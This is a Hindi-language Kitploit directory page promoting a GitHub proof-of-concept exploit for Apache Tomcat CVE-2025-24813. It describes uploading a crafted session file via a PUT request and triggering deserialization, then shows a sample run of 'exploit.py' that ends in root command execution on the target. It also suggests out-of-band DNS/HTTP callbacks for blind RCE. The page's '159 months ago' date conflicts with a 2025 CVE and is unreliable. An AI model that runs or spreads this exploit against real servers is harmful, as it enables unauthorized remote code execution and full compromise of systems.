Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813-PoC-exploit — Apache Tomcat डिसीरियलाइज़ेशन RCE (CVE-2025-24813) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। PUT अनुरोध के माध्यम से क्राफ्टेड सत्र फ़ाइल अपलोड करता है और लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए डिसीरियलाइज़ेशन ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/gunyakit/cve-2025-24813-poc-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubgunyakit/cve-2025-24813-poc-exploit

CVE-2025-24813-PoC-exploit

Apache Tomcat डिसीरियलाइज़ेशन RCE (CVE-2025-24813) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। PUT अनुरोध के माध्यम से क्राफ्टेड सत्र फ़ाइल अपलोड करता है और लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए डिसीरियलाइज़ेशन ट्रिगर करता है।

रिपॉजिटरी देखें
159 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24813-PoC-exploit

Apache Tomcat डिसीरियलाइज़ेशन RCE

❯ python3 exploit.py http://localhost:8080/ "id"
============================================================
CVE-2025-24813 - Apache Tomcat Partial PUT RCE
============================================================

[*] Target: http://localhost:8080
[*] Command: id

[*] Creating exploit payload...
[*] Uploading payload via PUT to: http://localhost:8080/session/exploit.session
[*] PUT Response: 201
[+] Payload uploaded successfully!

[*] Triggering deserialization...
[*] Trigger Response: 200

[*] Response body:

<!DOCTYPE html>
<html>
<head><title>Deserialization Triggered!</title></head>
<body style="background:#1a1a2e;color:#e0e0e0;font-family:monospace;padding:2rem;">
<h1 style="color:#ef4444;">⚠️ Deserialization RCE Triggered!</h1>
<p>Session file deserialized: exploit.session</p>
<p>Command executed: <code style="color:#4ade80;">id</code></p>
<hr>
<pre style="background:#0a0a0a;padding:1rem;border-radius:8px;color:#00d4ff;">
uid=0(root) gid=0(root) groups=0(root)

</pre>
</body>
</html>


[*] Exploit complete!

If deserialization worked, check target for command execution.
For blind RCE, use out-of-band techniques (DNS/HTTP callbacks)
टूल डाउनलोड करें